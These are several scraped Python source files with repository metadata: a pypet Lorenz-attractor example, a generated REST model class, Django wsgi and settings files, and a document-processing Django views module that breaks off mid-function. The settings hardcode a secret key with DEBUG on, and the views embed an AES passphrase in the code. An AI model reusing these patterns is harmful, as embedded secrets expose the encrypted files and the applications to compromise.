1bea9bc3616fe721a74dbcd53630aec212558032 | 8420f7c680f1b3b66d7f903b9986fdd533ce63d9 | /examples/example_05_custom_parameter.py | ac1416041fcbbc99d18abbfcf8370ba211ebd2c4 | [
"BSD-3-Clause"
] | permissive | ilonajulczuk/pypet | 9cef890cc856a769441aef983e4367fee56d1d12 | 99dd37243c30178d3dc02798dcc6aa9320b6c213 | refs/heads/master | 2020-12-26T11:21:16.691896 | 2014-04-16T07:53:37 | 2014-04-16T07:53:37 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 10,240 | py | __author__ = 'Robert Meyer'
import numpy as np
import inspect
from pypet.environment import Environment
from pypet.parameter import Parameter, ArrayParameter
from pypet.trajectory import Trajectory
import matplotlib.pyplot as plt
from mpl_toolkits.mplot3d import Axes3D
# Here we will see how we can write our own custom parameters and how we can use
# it with a trajectory.
# Now we want to do a more sophisticated simulations, we will integrate a differential equation
# with an Euler scheme
# Let's first define our job to do
def euler_scheme(traj, diff_func):
"""Simulation function for Euler integration.
:param traj:
Container for parameters and results
:param diff_func:
The differential equation we want to integrate
"""
steps = traj.steps
initial_conditions = traj.initial_conditions
dimension = len(initial_conditions)
# This array will collect the results
result_array = np.zeros((steps,dimension))
# Get the function parameters stored into `traj` as a dictionary
# with the (short) names as keys :
func_params_dict = traj.func_params.f_to_dict(short_names=True, fast_access=True)
# Take initial conditions as first result
result_array[0] = initial_conditions
# Now we compute the Euler Scheme steps-1 times
for idx in range(1,steps):
result_array[idx] = diff_func(result_array[idx-1], **func_params_dict) * traj.dt + \
result_array[idx-1]
# Note the **func_params_dict unzips the dictionary, it's the reverse of **kwargs in function
# definitions!
#Finally we want to keep the results
traj.f_add_result('euler_evolution', data=result_array, comment='Our time series data!')
# Ok, now we want to make our own (derived) parameter that stores source code of python functions.
# We do NOT want a parameter that stores an executable function. This would complicate
# the problem a lot. If you have something like that in mind, you might wanna take a look
# at the marshal (http://docs.python.org/2/library/marshal) module
# or dill (https://pypi.python.org/pypi/dill) package.
# Our intention here is to define a parameter that we later on use as a derived parameter
# to simply keep track of the source code we use ('git' would be, of course, the better solution
# but this is just an illustrative example)
class FunctionParameter(Parameter):
    # We can go for a cheap solution and make use of the function `_convert_data` of the parent.
# This gets called before adding data to the parameter to turn numpy arrays
# into read-only numpy arrays. But we will use the function for our purpose to extract
# the source code:
def _convert_data(self, val):
if callable(val):
return inspect.getsource(val)
else:
return super(FunctionParameter,self)._convert_data(val)
    # For more complicated parameters you might consider implementing:
# `f_supports` (we do not need it since we convert the data to stuff the parameter already
# supports, and that is strings!)
#
# and
# the private functions
#
    # `_values_of_same_type` (to tell whether data is similar, i.e. whether two data items agree in their
# type, this is important to only allow exploration within the same dimension.
# For instance, a parameter that stores integers, should only explore integers etc.)
#
# and
#
# `_equal_values` (to tell if two data items are equal. This is important for merging if you
# want to erase duplicate parameter points. The trajectory needs to know when a
# parameter space point was visited before.)
#
# and
#
# `_store` (to be able to turn complex data into basic types understood by the storage service)
#
# and
#
# `_load` (to be able to recover your complex data form the basic types understood by the storage
# service)
#
# But for now we will rely on the parent functions and hope for the best!
# Ok now let's follow the ideas in the final section of the cookbook and let's
# have a part in our simulation that only defines the parameters.
def add_parameters(traj):
"""Adds all necessary parameters to the `traj` container"""
traj.f_add_parameter('steps', 10000, comment='Number of time steps to simulate')
traj.f_add_parameter('dt', 0.01, comment='Step size')
# Here we want to add the initial conditions as an array parameter. We will simulate
# a 3-D differential equation, the Lorenz attractor.
traj.f_add_parameter(ArrayParameter,'initial_conditions', np.array([0.0,0.0,0.0]),
comment = 'Our initial conditions, as default we will start from'
' origin!')
# We will group all parameters of the Lorenz differential equation into the group 'func_params'
traj.f_add_parameter('func_params.sigma', 10.0)
traj.f_add_parameter('func_params.beta', 8.0/3.0)
traj.f_add_parameter('func_params.rho', 28.0)
#For the fun of it we will annotate the group
traj.func_params.v_annotations.info='This group contains as default the original values chosen ' \
'by Edward Lorenz in 1963. Check it out on wikipedia ' \
'(https://en.wikipedia.org/wiki/Lorenz_attractor)!'
# We need to define the lorenz function, we will assume that the value array is 3 dimensional,
# First dimension contains the x-component, second y-component, and third the z-component
def diff_lorenz(value_array, sigma, beta, rho):
"""The Lorenz attractor differential equation
:param value_array: 3d array containing the x,y, and z component values.
:param sigma: Constant attractor parameter
    :param beta: Constant attractor parameter
:param rho: Constant attractor parameter
:return: 3d array of the Lorenz system evaluated at `value_array`
"""
diff_array = np.zeros(3)
diff_array[0] = sigma * (value_array[1]-value_array[0])
diff_array[1] = value_array[0] * (rho - value_array[2]) - value_array[1]
diff_array[2] = value_array[0] * value_array[1] - beta * value_array[2]
return diff_array
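
# Sanity check (added, usable standalone): the origin is a fixed point of the
# Lorenz system, so the derivative there must vanish.
assert not diff_lorenz(np.zeros(3), sigma=10.0, beta=8.0/3.0, rho=28.0).any()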
# And here goes our main function
def main():
env = Environment(trajectory='Example_05_Euler_Integration',
filename='experiments/example_05/HDF5/example_05.hdf5',
file_title='Example_05_Euler_Integration',
log_folder='experiments/example_05/LOGS/',
comment = 'Go for Euler!')
traj = env.v_trajectory
trajectory_name = traj.v_name
# 1st a) phase parameter addition
add_parameters(traj)
# 1st b) phase preparation
# We will add the differential equation (well, its source code only) as a derived parameter
traj.f_add_derived_parameter(FunctionParameter,'diff_eq', diff_lorenz,
comment='Source code of our equation!')
# We want to explore some initial conditions
traj.f_explore({'initial_conditions' : [
np.array([0.01,0.01,0.01]),
np.array([2.02,0.02,0.02]),
np.array([42.0,4.2,0.42])
]})
# 3 different conditions are enough for an illustrative example
# 2nd phase let's run the experiment
# We pass `euler_scheme` as our top-level simulation function and
# the Lorenz equation 'diff_lorenz' as an additional argument
env.f_run(euler_scheme, diff_lorenz)
# We don't have a 3rd phase of post-processing here
# 4th phase analysis.
# I would recommend to do post-processing completely independent from the simulation,
# but for simplicity let's do it here.
# Let's assume that we start all over again and load the entire trajectory new.
# Yet, there is an error within this approach, do you spot it?
del traj
traj = Trajectory(filename='experiments/example_05/HDF5/example_05.hdf5')
# We will only fully load parameters and derived parameters.
# Results will be loaded manually later on.
try:
# However, this will fail because our trajectory does not know how to
# build the FunctionParameter. You have seen this coming, right?
traj.f_load(name=trajectory_name,load_parameters=2,
load_derived_parameters=2,load_results=1)
except ImportError as e:
        print 'That didn\'t work, I am sorry. %s ' % e.message
    # Ok, let's try again, but this time adding our parameter to the imports
traj = Trajectory(filename='experiments/example_05/HDF5/example_05.hdf5',
dynamically_imported_classes=FunctionParameter)
# Now it works:
traj.f_load(name=trajectory_name,load_parameters=2,
load_derived_parameters=2,load_results=1)
#For the fun of it, let's print the source code
print '\n ---------- The source code of your function ---------- \n %s' % traj.diff_eq
# Let's get the exploration array:
initial_conditions_exploration_array = traj.f_get('initial_conditions').f_get_range()
# Now let's plot our simulated equations for the different initial conditions:
# We will iterate through the run names
for idx, run_name in enumerate(traj.f_get_run_names()):
#Get the result of run idx from the trajectory
euler_result = traj.results.f_get(run_name).euler_evolution
# Now we manually need to load the result. Actually the results are not so large and we
# could load them all at once. But for demonstration we do as if they were huge:
traj.f_load_item(euler_result)
euler_data = euler_result.data
#Plot fancy 3d plot
fig = plt.figure(idx)
ax = fig.gca(projection='3d')
x = euler_data[:,0]
y = euler_data[:,1]
z = euler_data[:,2]
ax.plot(x, y, z, label='Initial Conditions: %s' % str(initial_conditions_exploration_array[idx]))
plt.legend()
plt.show()
# Now we free the data again (because we assume its huuuuuuge):
del euler_data
euler_result.f_empty()
# You have to click through the images to stop the example_05 module!
if __name__ == '__main__':
main()
| [
"[email protected]"
] | |
18f7fd778281764630b6d87c06f297330644c9a1 | 7bededcada9271d92f34da6dae7088f3faf61c02 | /pypureclient/flasharray/FA_2_17/models/reference_with_type.py | 686da10b71d57d6ece1d116f5a7668ce8c35aa23 | [
"BSD-2-Clause"
] | permissive | PureStorage-OpenConnect/py-pure-client | a5348c6a153f8c809d6e3cf734d95d6946c5f659 | 7e3c3ec1d639fb004627e94d3d63a6fdc141ae1e | refs/heads/master | 2023-09-04T10:59:03.009972 | 2023-08-25T07:40:41 | 2023-08-25T07:40:41 | 160,391,444 | 18 | 29 | BSD-2-Clause | 2023-09-08T09:08:30 | 2018-12-04T17:02:51 | Python | UTF-8 | Python | false | false | 4,557 | py | # coding: utf-8
"""
FlashArray REST API
No description provided (generated by Swagger Codegen https://github.com/swagger-api/swagger-codegen)
OpenAPI spec version: 2.17
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
import pprint
import re
import six
import typing
from ....properties import Property
if typing.TYPE_CHECKING:
from pypureclient.flasharray.FA_2_17 import models
class ReferenceWithType(object):
"""
Attributes:
swagger_types (dict): The key is attribute name
and the value is attribute type.
attribute_map (dict): The key is attribute name
and the value is json key in definition.
"""
swagger_types = {
'id': 'str',
'name': 'str',
'resource_type': 'str'
}
attribute_map = {
'id': 'id',
'name': 'name',
'resource_type': 'resource_type'
}
required_args = {
}
def __init__(
self,
id=None, # type: str
name=None, # type: str
resource_type=None, # type: str
):
"""
Keyword args:
id (str): A globally unique, system-generated ID. The ID cannot be modified.
name (str): The resource name, such as volume name, pod name, snapshot name, and so on.
resource_type (str): Type of the object (full name of the endpoint). Valid values are `hosts`, `host-groups`, `network-interfaces`, `pods`, `ports`, `pod-replica-links`, `subnets`, `volumes`, `volume-snapshots`, `volume-groups`, `directories`, `policies/nfs`, `policies/smb`, and `policies/snapshot`, etc.
"""
if id is not None:
self.id = id
if name is not None:
self.name = name
if resource_type is not None:
self.resource_type = resource_type
def __setattr__(self, key, value):
if key not in self.attribute_map:
raise KeyError("Invalid key `{}` for `ReferenceWithType`".format(key))
self.__dict__[key] = value
def __getattribute__(self, item):
value = object.__getattribute__(self, item)
if isinstance(value, Property):
raise AttributeError
else:
return value
def __getitem__(self, key):
if key not in self.attribute_map:
raise KeyError("Invalid key `{}` for `ReferenceWithType`".format(key))
return object.__getattribute__(self, key)
def __setitem__(self, key, value):
if key not in self.attribute_map:
raise KeyError("Invalid key `{}` for `ReferenceWithType`".format(key))
object.__setattr__(self, key, value)
def __delitem__(self, key):
if key not in self.attribute_map:
raise KeyError("Invalid key `{}` for `ReferenceWithType`".format(key))
object.__delattr__(self, key)
def keys(self):
return self.attribute_map.keys()
def to_dict(self):
"""Returns the model properties as a dict"""
result = {}
for attr, _ in six.iteritems(self.swagger_types):
if hasattr(self, attr):
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(map(
lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
value
))
elif hasattr(value, "to_dict"):
result[attr] = value.to_dict()
elif isinstance(value, dict):
result[attr] = dict(map(
lambda item: (item[0], item[1].to_dict())
if hasattr(item[1], "to_dict") else item,
value.items()
))
else:
result[attr] = value
if issubclass(ReferenceWithType, dict):
for key, value in self.items():
result[key] = value
return result
def to_str(self):
"""Returns the string representation of the model"""
return pprint.pformat(self.to_dict())
def __repr__(self):
"""For `print` and `pprint`"""
return self.to_str()
def __eq__(self, other):
"""Returns true if both objects are equal"""
if not isinstance(other, ReferenceWithType):
return False
return self.__dict__ == other.__dict__
def __ne__(self, other):
"""Returns true if both objects are not equal"""
return not self == other
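
if __name__ == '__main__':
    # Usage sketch (added; the values are illustrative, not from a live array):
    ref = ReferenceWithType(id='1', name='vol-1', resource_type='volumes')
    print(ref.to_dict())  # -> {'id': '1', 'name': 'vol-1', 'resource_type': 'volumes'}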
| [
"[email protected]"
] | |
0f7ec680721030d047f06b1b94341a7c982454b5 | 402ef712e2d98bb616e64eb7d57145a643ad61d7 | /backend/mobile_testing_app__15569/wsgi.py | 7832e8909382ddeb029a4fbf984861ab927942fb | [] | no_license | crowdbotics-apps/mobile-testing-app--15569 | ce5299c1dc7b5ebf531043dbe7614c7206880ce0 | 5c6e5f045a9ba80592e81584ac7c88ea53eabdfa | refs/heads/master | 2023-01-24T21:54:07.548231 | 2020-11-24T06:01:05 | 2020-11-24T06:01:05 | 315,533,722 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 427 | py | """
WSGI config for mobile_testing_app__15569 project.
It exposes the WSGI callable as a module-level variable named ``application``.
For more information on this file, see
https://docs.djangoproject.com/en/2.2/howto/deployment/wsgi/
"""
import os
from django.core.wsgi import get_wsgi_application
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'mobile_testing_app__15569.settings')
application = get_wsgi_application()
| [
"[email protected]"
] | |
235f40b873b377065055784a18c708cd33c11a20 | dbdb9b2102b25808f0363d50ff85626921b1c70a | /rest_api_3_product/settings.py | baee96ac579b1af253e75334bad35faaa15bf71c | [] | no_license | vinodkumar96/rest_api_3_product | dee834e704c25c812ba94a682641ab7f9bcabd44 | b0be03b80d7b59ef4d81e02f977c5ed1df862709 | refs/heads/master | 2020-07-04T20:38:15.552542 | 2019-08-14T19:08:09 | 2019-08-14T19:08:09 | 202,409,475 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,242 | py | """
Django settings for rest_api_3_product project.
Generated by 'django-admin startproject' using Django 2.2.4.
For more information on this file, see
https://docs.djangoproject.com/en/2.2/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/2.2/ref/settings/
"""
import os
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/2.2/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = 'd56v)@7t(80-417mdh)+3++!d5hd($la5m$w*b4xum9vjfnx)u'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = [
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'Rapp_3_ModelClass.apps.Rapp3ModelclassConfig',
'rest_framework',
]
MIDDLEWARE = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'rest_api_3_product.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
        'DIRS': [os.path.join(BASE_DIR, 'templates')],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'rest_api_3_product.wsgi.application'
# Database
# https://docs.djangoproject.com/en/2.2/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),
}
}
# Password validation
# https://docs.djangoproject.com/en/2.2/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/2.2/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/2.2/howto/static-files/
STATIC_URL = '/static/'
| [
"[email protected]"
] | |
adbd9301b5bda91c278b06fb2830f00b52df2ea7 | a3c970cb385cb4c6e2122b3c096f61ceb37b3acd | /defence/.history/dashboard/do_views_20191211183052.py | 90e0aa9f0297d160ed8d425b8692c054943d6df7 | [] | no_license | kirubasuba/certa | ec7cd06352ff9c477236afcead89daf9a28943bc | 111f2bdfd2626475951f5f86746f04f5fd42ded4 | refs/heads/master | 2022-12-14T03:44:20.207843 | 2020-05-19T12:36:15 | 2020-05-19T12:36:15 | 212,568,163 | 0 | 0 | null | 2022-11-22T04:41:30 | 2019-10-03T11:56:13 | Python | UTF-8 | Python | false | false | 29,600 | py | from django.shortcuts import render
from django.contrib.auth.decorators import login_required
from django.conf import settings
from django.contrib.auth.models import User,Group
from .forms import UserCreationForm,TAapplicationForm,cemilacUserForm,proforma_A_form,commentsUploadForm
from django.contrib import messages
from common.decorators import role_required
from authmgmt.models import registration
from .models import TAapplicationmodel,proforma_A_model,TAapplicationfiles,statusmodel,commentsmodel,idgenerationmodel
from django.template.loader import get_template
from xhtml2pdf import pisa
from django.http import HttpResponse
from .views import link_callback
import os
from os import stat, remove
import pyAesCrypt
from datetime import datetime
from django.utils import formats
import comtypes.client
import pythoncom
import urllib.parse
from docx import Document
import io
from io import BytesIO,StringIO
# import io.StringIO
from django.core.files import File
from docxtpl import DocxTemplate  # provides DocxTemplate used in draft_ta/data_sheet below
@login_required(login_url=settings.LOGIN_URL)
@role_required(allowed_roles=["Dealing Officer"])
def process_proforma(request):
reg=TAapplicationmodel.objects.filter(file_in_id=str(request.user.id))
return render(request, 'dealing officer/viewtyperecord.html',{'details':reg,'status':True})
# @login_required(login_url=settings.LOGIN_URL)
# @role_required(allowed_roles=["TA Coordinator"])
# def checklist(request):
# reg=TAapplicationmodel.objects.all()
# return render(request, 'dealing officer/viewtyperecord.html',{'details':reg,'status':True})
@login_required(login_url=settings.LOGIN_URL)
@role_required(allowed_roles=["TA Applicant","Dealing Officer","TA Coordinator","RD","TCS-GD","TCS-CE","TCS-Dealing Officer","TCS-TA Coordinator"])
def viewtyperecord(request,id):
print('saiiiiiiiiiiiiiii',id)
# reg=get_object_or_404(registration,id=id)
# taa=TAapplicationmodel.objects.filter(user_id=id).first()
# if request.method == 'POST':
# return render(request, 'dealing officer/newtypeapproval.html', {'form': form,})
# else:
# form = TAapplicationForm(instance=taa)
# template = get_template('applicant/newtypeapprovalpdf.html')
# context= {
# 'firmname':taa.firmname,
# 'addr1':taa.addr1,
# 'addr2':taa.addr2,
# 'tot':taa.tot,
# 'item_name':taa.item_name,
# 'part_no':taa.part_no,
# 'desc':taa.desc,
# 'spec': taa.spec,
# 'dal_mdi':taa.dal_mdi,
# 'bom':taa.bom,
# 'sop_acbs':taa.sop_acbs,
# 'pc': taa.pc,
# 'tre':taa.tre,
# 'otheritems':taa.otheritems
# }
# response = HttpResponse(content_type='application/pdf')
# response['Content-Disposition'] = 'attachment; filename="report.pdf"'
# html = template.render(context)
# pisaStatus = pisa.CreatePDF(
# html, dest=response, link_callback=link_callback)
# if pisaStatus:
# return HttpResponse(response, content_type='application/pdf')
# # if error then show some funy view
# if pisaStatus.err:
# return HttpResponse('We had some errors <pre>' + html + '</pre>')
# return response
# return render(request, 'applicant/newtypeapprovalpdf.html', {'form': form,})
# curr_path=curr_path.replace('/','\\')
# new_path = os.path.join(settings.MEDIA_ROOT + curr_path)
# with open(new_path+'TAapplication.pdf', 'rb') as pdf:
# response = HttpResponse(pdf.read(),content_type='application/pdf')
# response['Content-Disposition'] = 'filename=some_file.pdf'
# return response
print(id,'kkk')
idprefix=request.POST['idprefix']
filename=request.POST['filename']
if filename!='':
comment=request.POST['comment']
if filename=="TAapplication.pdf":
tf=TAapplicationfiles.objects.filter(user_id=id,filecategory="TAapplication").first()
tf.comments=comment
tf.save()
pro=proforma_A_model.objects.all()
messages.success(request, 'Comments Successfully Submitted !')
fc=TAapplicationmodel.objects.filter(user_id=id,idprefix=idprefix).first()
print(fc.idprefix,'kkk')
tafil=TAapplicationfiles.objects.filter(user_id=fc.user_id,filecategory="TAapplication",refid=fc.idprefix).first()
curr_path = "/"+str(fc.user_id)+"/"+fc.idprefix+"Annexure 1/TAapplication/"
print(tafil,'tafile')
filename='TAapplication.pdf'
url='http://127.0.0.1:8000/media'+urllib.parse.quote(curr_path)+'TAapplication.pdf'
print(tafil.comments,'new')
return render(request, 'dealing officer/pdf viewer.html',{'url':url,'id':id,'filename':filename,'fc':tafil.comments,'idprefix':fc.idprefix})
@login_required(login_url=settings.LOGIN_URL)
@role_required(allowed_roles=["Dealing Officer","TA Coordinator","RD","TCS-GD","TCS-CE","TCS-Dealing Officer","TCS-TA Coordinator"])
def draft_ta(request,id):
doc_final_path ='E:/certa-drdo/certa/Draft_TA.docx'
pdf_final_path ='E:/certa-drdo/certa/Draft_TA.pdf'
final_path='E:/certa-drdo/certa/'
if os.path.isfile(pdf_final_path):
with open(pdf_final_path, 'rb') as pdf:
response = HttpResponse(pdf.read(),content_type='application/pdf')
response['Content-Disposition'] = 'filename=some_file.pdf'
return response
elif os.path.isfile(doc_final_path):
print('mmmmmmmmmmmmmm')
pythoncom.CoInitialize()
wdFormatPDF = 17
# print(tempfile.gettempdir(),'temp')
in_file = os.path.abspath(doc_final_path)
# out_file = os.path.abspath('D:/cemilac/certa/defence/media/org1.pdf')
word = comtypes.client.CreateObject('Word.Application')
doc = word.Documents.Open(in_file)
doc.SaveAs('E:/certa-drdo/certa/Draft_TA.pdf', FileFormat=wdFormatPDF)
print('nnnnnnnnnnn')
doc.Close()
word.Quit()
with open(final_path+'Draft_TA.pdf', 'rb') as pdf:
response = HttpResponse(pdf.read(),content_type='application/pdf')
response['Content-Disposition'] = 'filename=some_file.pdf'
return response
else:
idprefix=request.POST['idprefix']
print(idprefix,'jjjjjjjjjjjj')
curr_path = "/"+str(id)+ "/"+idprefix+"Annexure 7/"
curr_path=curr_path.replace('/','\\')
new_path = os.path.join(settings.MEDIA_ROOT + curr_path)
# if os.path.isdir(new_path):
# with open(new_path+'Draft_TA.pdf', 'rb') as pdf:
# response = HttpResponse(pdf.read(),content_type='application/pdf')
# response['Content-Disposition'] = 'filename=some_file.pdf'
# return response
# else:
taa=TAapplicationmodel.objects.filter(user_id=id).first()
# template = get_template('dealing officer/Draft TA pdf.html')
target_file = StringIO()
template = DocxTemplate("E:/certa-drdo/certa/dashboard/templates/dealing officer/template.docx")
context= {
'firmname':taa.firmname,
'addr1':taa.addr1,
'item_name':taa.item_name,
'part_no':taa.part_no
}
        template.render(context)  # docxtpl fills the template placeholders in place
        template.save("Draft_TA.docx")  # write the rendered document to disk
new_path1 = 'E:\certa-drdo\certa\Draft_TA.docx'
output_path = os.path.join(settings.MEDIA_ROOT) + '/89/result.pdf'
# new_path=new_path.replace('\','//')
taa=TAapplicationfiles.objects.filter(user_id=id,refid=idprefix,refpath='Annexure 4.13').first()
aesurl=taa.filepath
docurl = aesurl[:-4]
print('aesview',aesurl)
print('docurl',docurl)
bufferSize = 64 * 1024
passw = "#EX\xc8\xd5\xbfI{\xa2$\x05(\xd5\x18\xbf\xc0\x85)\x10nc\x94\x02)j\xdf\xcb\xc4\x94\x9d(\x9e"
encFileSize = stat(aesurl).st_size
with open(aesurl, "rb") as fIn:
with open(docurl, "wb") as fOut:
pyAesCrypt.decryptStream(fIn, fOut, passw, bufferSize, encFileSize)
# curr_path = "/"+str(id)+ "/Annexure 4.13/PC/pc.docx.aes"
# curr_path=curr_path.replace('/','\\')
# new_path = os.path.join(settings.MEDIA_ROOT + curr_path)
# templateDoc = Document(new_path1)
templateDoc1 = Document(new_path1)
templateDoc = Document(docurl)
templateDoc1.add_page_break()
for element in templateDoc.element.body:
templateDoc1.element.body.append(element)
templateDoc1.save(new_path1)
print(request.user.id,'kkkkkkkk')
messages.success(request, 'Draft_TA Successfully Prepared, Click again to view the file !')
reg=TAapplicationmodel.objects.filter(file_in_id=str(request.user.id),file_in_name="TCS-DO")
print('reggggggg',reg)
return render(request, 'tcs do/receivedtyperecord.html',{'details':reg,'status':True})
# pisaStatus = pisa.CreatePDF(
# html, dest=response, link_callback=link_callback)
# if pisaStatus:
# return HttpResponse(response, content_type='application/pdf')
# # if error then show some funy view
# if pisaStatus.err:
# return HttpResponse('We had some errors <pre>' + html + '</pre>')
# return response
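# The stream-decrypt pattern above recurs throughout this module. A minimal
# helper sketch (assumes the same pyAesCrypt API, password handling and buffer
# size already used in these views; it is not wired into the existing code):
def decrypt_aes_file(aesurl, outurl, passw):
    # Decrypt the AES-encrypted file at aesurl, writing the plaintext to outurl.
    bufferSize = 64 * 1024
    encFileSize = stat(aesurl).st_size
    with open(aesurl, "rb") as fIn:
        with open(outurl, "wb") as fOut:
            pyAesCrypt.decryptStream(fIn, fOut, passw, bufferSize, encFileSize)
    return outurl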
@login_required(login_url=settings.LOGIN_URL)
@role_required(allowed_roles=["Dealing Officer","TA Coordinator","RD","TCS-GD","TCS-CE","TCS-Dealing Officer","TCS-TA Coordinator"])
def data_sheet(request,id):
idprefix=request.POST['idprefix']
print(idprefix,'jjjjjjjjjjjj')
doc_final_path ='E:/certa-drdo/certa/TA_Datasheet.docx'
final_path ='E:/certa-drdo/certa/'
# finalpath=final_path.replace('/','\\')
pdf_final_path ='E:/certa-drdo/certa/TA_Datasheet.pdf'
if os.path.isfile(pdf_final_path):
with open(pdf_final_path, 'rb') as pdf:
response = HttpResponse(pdf.read(),content_type='application/pdf')
response['Content-Disposition'] = 'filename=some_file.pdf'
return response
elif os.path.isfile(doc_final_path):
print('mmmmmmmmmmmmmm')
pythoncom.CoInitialize()
wdFormatPDF = 17
# print(tempfile.gettempdir(),'temp')
in_file = os.path.abspath(doc_final_path)
# out_file = os.path.abspath('D:/cemilac/certa/defence/media/org1.pdf')
word = comtypes.client.CreateObject('Word.Application')
doc = word.Documents.Open(in_file)
doc.SaveAs('E:/certa-drdo/certa/TA_Datasheet.pdf', FileFormat=wdFormatPDF)
print('nnnnnnnnnnn')
doc.Close()
word.Quit()
with open(final_path+'TA_Datasheet.pdf', 'rb') as pdf:
response = HttpResponse(pdf.read(),content_type='application/pdf')
response['Content-Disposition'] = 'filename=some_file.pdf'
return response
else:
curr_path = "/"+str(id)+ "/"+idprefix+"Annexure 6/"
curr_path=curr_path.replace('/','\\')
new_path = os.path.join(settings.MEDIA_ROOT + curr_path)
# if os.path.isdir(new_path):
# with open(new_path+'TA Datasheet.docx', 'rb') as pdf:
# response = HttpResponse(pdf.read(),content_type='application/pdf')
# response['Content-Disposition'] = 'filename=some_file.pdf'
# return response
# else:
taa=TAapplicationmodel.objects.filter(user_id=id).first()
# template = get_template('dealing officer/Draft TA pdf.html')
target_file = StringIO()
template = DocxTemplate("E:/certa-drdo/certa/dashboard/templates/dealing officer/DS template.docx")
context= {
'firmname':taa.firmname,
'addr1':taa.addr1,
'item_name':taa.item_name,
'part_no':taa.part_no
}
        template.render(context)  # docxtpl fills the template placeholders in place
        template.save("TA_Datasheet.docx")  # write the rendered document to disk
new_path1 = 'E:\certa-drdo\certa\TA_Datasheet.docx'
# output_path = os.path.join(settings.MEDIA_ROOT) + '/89/result.pdf'
# new_path=new_path.replace('\','//')
taa=TAapplicationfiles.objects.filter(user_id=id,refid=idprefix,refpath='Annexure 6').first()
aesurl=taa.filepath
docurl = aesurl[:-4]
print('aesview',aesurl)
print('docurl',docurl)
bufferSize = 64 * 1024
passw = "#EX\xc8\xd5\xbfI{\xa2$\x05(\xd5\x18\xbf\xc0\x85)\x10nc\x94\x02)j\xdf\xcb\xc4\x94\x9d(\x9e"
encFileSize = stat(aesurl).st_size
with open(aesurl, "rb") as fIn:
with open(docurl, "wb") as fOut:
pyAesCrypt.decryptStream(fIn, fOut, passw, bufferSize, encFileSize)
templateDoc1 = Document(new_path1)
templateDoc = Document(docurl)
# templateDoc1.add_page_break()
for element in templateDoc.element.body:
templateDoc1.element.body.append(element)
templateDoc1.save(new_path1)
messages.success(request, 'Data_sheet Successfully Prepared, Click again to view the file !')
reg=TAapplicationmodel.objects.filter(file_in_id=str(request.user.id))
return render(request, 'tcs do/receivedtyperecord.html',{'details':reg,'status':True})
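# A sketch of the Word-to-PDF conversion used in these views, factored into a
# helper (assumes comtypes plus a local Microsoft Word installation, exactly
# like the inline code above; not wired into the existing views):
def convert_docx_to_pdf(docx_path, pdf_path):
    pythoncom.CoInitialize()
    wdFormatPDF = 17  # Word's PDF export format constant
    word = comtypes.client.CreateObject('Word.Application')
    doc = word.Documents.Open(os.path.abspath(docx_path))
    doc.SaveAs(os.path.abspath(pdf_path), FileFormat=wdFormatPDF)
    doc.Close()
    word.Quit()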
@login_required(login_url=settings.LOGIN_URL)
@role_required(allowed_roles=["Dealing Officer","TA Coordinator","RD","TCS-GD","TCS-CE","TCS-Dealing Officer","TCS-TA Coordinator"])
def addproforma(request,id):
idprefix=request.POST['idprefix']
print(idprefix,'kkkkkkkkkk')
fc=TAapplicationmodel.objects.filter(user_id=id,idprefix=idprefix).first()
print(fc.idprefix,'kkk')
# tafil=TAapplicationfiles.objects.filter(user_id=fc.user_id,filecategory="TAapplication",refid=fc.idprefix).first()
curr_path = "/"+str(fc.user_id)+ fc.idprefix+"Annexure 3/Proforma_A/"
curr_path=curr_path.replace('/','\\')
new_path = os.path.join(settings.MEDIA_ROOT + curr_path)
if os.path.isdir(new_path):
with open(new_path+'Proforma_A.pdf', 'rb') as pdf:
response = HttpResponse(pdf.read(),content_type='application/pdf')
response['Content-Disposition'] = 'filename=some_file.pdf'
return response
else:
print('sai',fc.user_id,fc.idprefix)
form = proforma_A_form(request=fc.user_id,idpre=fc.idprefix)
pro=proforma_A_model.objects.filter(user_id=fc.user_id,idprefix=idprefix).first()
taa=TAapplicationmodel.objects.filter(user_id=fc.user_id,idprefix=idprefix).first()
if pro:
template = get_template('dealing officer/proformapdf.html')
date_joined = datetime.now()
formatted_datetime = date_joined.strftime("%Y-%m-%d")
print(formatted_datetime,'dte')
